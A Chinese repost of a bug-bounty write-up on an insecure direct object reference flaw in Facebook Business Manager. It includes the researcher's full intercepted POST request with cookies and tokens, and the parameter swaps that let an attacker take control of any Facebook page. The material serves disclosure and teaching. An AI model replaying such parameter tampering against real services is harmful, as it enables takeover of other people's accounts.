十秒内黑掉Facebook主页?这个漏洞竟然价值1.6万美金(含漏洞分析)

[[171789]]

如何黑掉你的Facebook?这位来自印度的安全研究专家表示有话要说。根据国外媒体的最新报道,一位名叫ArunSureshkumar的印度安全专家在Facebook的“企业管理平台”(BusinessManager)中发现了一个严重的漏洞,攻击者可以利用该漏洞来攻击任何人的Facebook主页。

Facebook的企业管理平台(BusinessManager)是什么?

“企业管理平台”可以帮助企业、广告代理商、或行销人员在统一界面下集中管理企业旗下的Facebook主页、广告账号、以及付款方式,从而避免了管理人员需要不断切换界面的尴尬局面。

[[171790]]

大型企业旗下通常会有多个Facebook粉丝主页,而这些主页又各自有不同的市场定位和目标。对于企业管理者而言,“企业管理平台”可以帮助他们在同一界面下管理所有的粉丝专页和广告账号,不仅如此,他们还可以查看、移除、或变更相应用户的权限。

而各个Facebook粉丝专页的管理者可以登入“企业管理平台”,并直接访问广告账号和主页的各种信息。此时并不会向雇主显示所有的Facebook个人资料,仅会显示姓名、公司名称、以及广告账号等信息,所以管理者不必担心需要将工作上接触的人加为Facebook好友。

不安全的直接对象引用

在我们对这一攻击技术进行分析之前,请允许我先给大家介绍一下“不安全的直接对象引用”的概念。

根据OWASP项目(开放式Web应用程序安全项目)所提供的定义,当一个Web应用程序可以根据用户提供的输入信息来向用户提供对象的直接访问,那么这就是一种不安全的直接对象引用。这个漏洞的存在,将允许攻击者绕过系统的身份验证机制,并直接访问到网络系统中的所有资源。

根据OWASP项目官方提供的信息:

“不安全的直接对象引用将允许攻击者绕过系统的身份验证机制,并可以通过修改对象的引用参数值来直接访问系统资源。这些资源有可能是属于其他用户的数据库数据,也有可能是存储在文件系统中的文件。如果Web应用程序在没有对用户的输入数据进行安全检测的情况下直接向用户提供了请求对象的访问权限,那么就会出现这种不安全的情况。”

Facebook漏洞分析

Sureshkumar在Facebook的企业管理平台中发现了一个IDOR(InsecureDirect Object References)漏洞,而在这个漏洞的帮助下,他可以在十秒之内获取到任意Facebook主页的控制权。

Sureshkumar用他的Facebook账号(ID=907970555981524)添加了一个测试账号(作为partner账号),这个partner账号的ID为991079870975788。他在测试中使用了BurpSuite来拦截Facebook的网络请求信息,并且修改了请求中的部分数据。

Sureshkumar在他发表的分析报告中公布了包含漏洞的网络请求数据:

  1. POST /business_share/asset_to_agency/?dpr=2 HTTP/1.1 
  2. Host: business.facebook.com 
  3. Connectionclose 
  4. Content-Length: 436 
  5. Origin: https://business.facebook.com 
  6. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 
  7. Content-Type: application/x-www-form-urlencoded 
  8. Accept: */* 
  9. Referer:https://business.facebook.com/settings/pages/536195393199075?business_id=907970555981524 
  10. Accept-Encoding: gzip, deflate, br 
  11. Accept-Language: en-US,en;q=0.8 
  12. Cookie: rc=2; datr=AWE3V–DUGNTOAy0wTGmpAXb; locale=en_GB;sb=BWE3V1vCnlxJF87yY9a8WWjP; pl=n; lu=gh2GPBnmZY1B1j_7J0Zi3nAA;c_user=100000771680694; xs=25%3A5C6rNSCaCX92MA%3A2%3A1472402327%3A4837;fr=05UM8RW0tTkDVgbSW.AWUB4pn0DvP1fQoqywWeORlj_LE.BXN2EF.IL.FfD.0.0.BXxBSo.AWXdKm2I;csm=2; s=Aa50vjfSfyFHHmC1.BXwxOY; _ga=GA1.2.1773948073.1464668667; p=-2;presence=EDvF3EtimeF1472469215EuserFA21B00771680694A2EstateFDutF1472469215051CEchFDp_5f1B00771680694F7CC;act=1472469233458%2F6 
  13. parent_business_id=907970555981524&agency_id=991079870975788&asset_id=536195393199075&role=MANAGER&__user=100000771680694&__a=1&__dyn=aKU-XxaAcoaucCJDzopz8aWKFbGEW8UhrWqw-xG2G4aK2i8zFE8oqCwkoSEvmbgcFV8SmqVUzxeUW4ohAxWdwSDBzovU-eBCy8b48xicx2aGewzwEx2qEN4yECcKbBy9onwFwHCBxungXKdAw&__req=e&__be=-1&__pc=PHASED%3Abrands_pkg&fb_dtsg=AQHoLGh1HUmf%3AAQGT4fDF1-nQ&ttstamp=265817211176711044972851091025865817184521026870494511081&__rev=2530733 

那么拿到这些数据之后,怎么才能攻击Facebook主页呢?

他用目标Facebook账号的ID值替换了请求数据中“asset_id”参数值,然后交换了“parent_business_id”和“agency_id”的值。除此之外,他还将“role”参数的值修改成了“MANAGER”。

  1. parent_business_id= 991079870975788 
  2. agency_id= 907970555981524 
  3. asset_id =190313461381022 
  4. role= MANAGER 

通过上述这一系列操作之后,Sureshkumar演示了如何攻击Facebook主页,并获取到了企业管理平台页面的管理员权限。除此之外,Sureshkumar还发布了一段攻击演示视频。

PoC视频:

https://youtu.be/BSnksWX5Kn0 

结束语

[[171791]]

这位来自印度的安全研究专家于2016年8月29日正式将该漏洞提交给了Facebook。Facebook的安全技术人员对该漏洞进行了分析,并且在调查过程中还意外发现了平台中的另外一个安全漏洞。

根据Facebook的漏洞奖励计划,这位社交网络中的巨头向Sureshkumar提供了一万六千美元的漏洞奖金。这个漏洞竟然价值1.6万美金,请问各位BugHunter心动了吗?

文章来源网络,作者:管理,如若转载,请注明出处:https://shuyeidc.com/wp/121717.html<

(0)
管理的头像管理
上一篇2025-02-22 00:26
下一篇 2025-02-22 00:28

相关推荐

  • jsp空间购买和交换数据空间怎么买,有哪些注意事项?

    购买JSP空间时,是否考虑过数据交换空间的性能?简米科技(2003年始创,23年行业沉淀)与酷番云(工信部一类增值电信全牌照)这类持牌自营机房的服务商,能确保数据交换的高效稳定,是值得优先选择的合作伙伴,为什么JSP空间需要搭配独立的数据交换空间从JSP应用特性看数据交换需求JSP基于Java技术,常用于企业级……

    2026-08-11
    0
  • 建网站用香港空间效果怎么样,香港空间稳定吗?

    建网站用香港空间,对于创建网站资产来说,核心价值在于免备案和全球带宽优势,尤其适合外贸、跨境电商和需要快速启动的项目,但你必须权衡国内访问延迟,并选择有资质的服务商以保证资产安全,香港空间的核心优势与适用边界免备案:节省时间就是节省成本国内服务器需要备案,通常需要10到20天,香港空间无需备案,域名解析后即可上……

    2026-08-11
    0
  • Java连接云数据库的方法是什么,如何操作

    Java连接云数据库的核心在于通过JDBC驱动,结合云服务商提供的连接地址、端口、数据库名及认证信息,配置安全策略(如SSL、IP白名单),即可实现稳定高效的远程数据库访问,基础准备:JDBC驱动与依赖管理连接云数据库前,需要确保开发环境具备对应的JDBC驱动,以最常见的MySQL为例,你需要引入mysql-c……

    2026-08-11
    0
  • 建网站公安联网备案必须使用数据码吗,备案流程是什么

    网站备案包括ICP备案和公安联网备案,两者缺一不可,公安联网备案必须使用服务商提供的数据码,选择持有合法资质的服务商是顺利通过备案的前提,为什么网站必须进行公安联网备案根据公安部《计算机信息网络国际联网安全保护管理办法》,网站开通后30日内必须到公安机关办理备案手续,未完成公安备案的网站,面临责令整改、关闭网站……

    2026-08-10
    0
  • 建一个企业网站大概需要多少钱?,怎么收费?

    建网站要多少钱,没有一个固定的数字,几百到几万都可能,但真正的“创建网站资产”绝不仅仅是初次投入的成本,而是基于长期稳定、合规和安全的持续性投入,其中核心取决于你选择了什么样的“地基”来承载你的业务,建站预算的构成与行业基准当你开始规划一个网站,最先面对的就是预算问题,一个常见的误区是只关注网站“看起来”的建造……

    2026-08-10
    0

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注